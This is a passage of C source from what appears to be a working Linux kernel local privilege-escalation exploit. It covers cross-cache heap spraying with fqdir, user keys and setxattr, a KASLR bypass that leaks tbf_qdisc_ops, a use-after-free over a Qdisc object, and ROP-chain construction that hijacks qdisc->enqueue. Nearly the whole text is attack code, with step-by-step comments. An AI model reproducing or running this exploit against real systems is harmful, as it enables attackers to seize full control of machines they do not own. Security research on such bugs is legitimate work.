	for (int i = 0; i < N_SPRAY_2; i++)
		task_set_state(t2[i], TASK_FREE_FQDIR);
	waitfor(1, "Freeing F2"); // Wait for tasks

	// Free the chunks in kmalloc-512 to bypass mm/slub.c:720
	for (int i = 0; i < 0x2fc; i++)
		tc_class(DEL_CLASS, "dummy", 696, "cbq", i);

	puts("[*] Spraying keys...");

	// Step 1.4 - Replace the bucket_table in dyn-kmalloc-1k with a user_key_payload
	// After the spray, the bucket_table pointer of the other fqdir will point to the user key
	for (int i = 0; i < N_KEYS_1; i++) {
		// Here fill_chunk() is used to zero out uninitialized memory before the user key is allocated.
		// We need to make sure the first two qwords of the user key (struct rcu_head) are zero to make the kernel happy
		// Basically we are faking bucket_table->size = 0 and bucket_table->nest = 0
		fill_chunk(NULL, 1024);
		key_alloc(i, data, 512 + 1);

		// When a user key is allocated, another structure is allocated and automatically freed in kmalloc-512
		// Sleeping for a while is helpful to make sure it is always allocated in the same chunk
		// Useful to minimize noise in kmalloc-512
		usleep(30000);
	}

	// Step 1.5 - Now free the other fqdir
	// The user key pointed by the bucket_table pointer will be arbitrarily freed
	for (int i = 0; i < N_SPRAY_1; i++)
		task_set_state(t1[i], TASK_FREE_FQDIR);
	waitfor(2, "Freeing F1");

	// [STAGE 2] KASLR Bypass
	// Cache transfer is completed, now corrupt the user key in dyn-kmalloc-1k
	// with a tbf Qdisc object and leak the tbf_qdisc_ops pointer

	// Step 2.0 - Overwrite the user key with a tbf Qdisc structure
	for (int i = 0; i < N_NET_INTERFACES; i++) {
		// Alloc tbf Qdisc in dyn-kmalloc-1k
		tc_qdisc(ADD_QDISC, "dummy", i, "tbf");
		// Put the network interface up so it can receive packets later
		net_if(ADD_LINK, "dummy", i, IFF_UP, true);
	}

	// Step 2.1 - Leak tbf_qdisc_ops
	if (bypass_kaslr() < 0)
		goto error;

	// [STAGE 3] RIP control
	// Corrupt qdisc->enqueue() and send packets to the network interface to hijack control flow

	// Step 3.0 - Free all the keys
	for (int i = 0; i < N_KEYS_1; i++)
		if (i != kid)
			key_free(i);

	// Free the corrupted key causing a UAF over the Qdisc object
	key_free(kid);
	waitfor(1, "Freeing keys"); // RCU grace period

	build_ropchain(data);
	puts("[+] ROP-chain ready:");
	hexdump(data, 0x100);

	// Step 3.1 - Finally reallocate the keys to overwrite the Qdisc structure.
	// qdisc->enqueue() is overwritten by a stack pivot gadget
	puts("[*] Reallocating keys...");
	for (int i = 0; i < N_KEYS_2; i++) {
		/*
		 *	With user_key_payload, we can only control data after offset 0x18,
		 *	but offsetof(struct Qdisc, enqueue) is 0, so we need to use fill_chunk()
		 *	(setxattr) before allocating the key to control the first two uninitialized qwords (struct rcu_head).
		 *	Basically setxattr() is used to write the first two gadgets at offset 0x00 and 0x08.
		 */
		fill_chunk(data, 512 + 1);
		key_alloc(i, data + 24, 512 + 1);
	}

	// Step 3.2 - Send packets to the network interface to hijack
	// control flow when qdisc->enqueue() is called
	abracadabra();
	return 0;

error:
	puts("[x] Exploit failed, try again.");
	return -1;
}
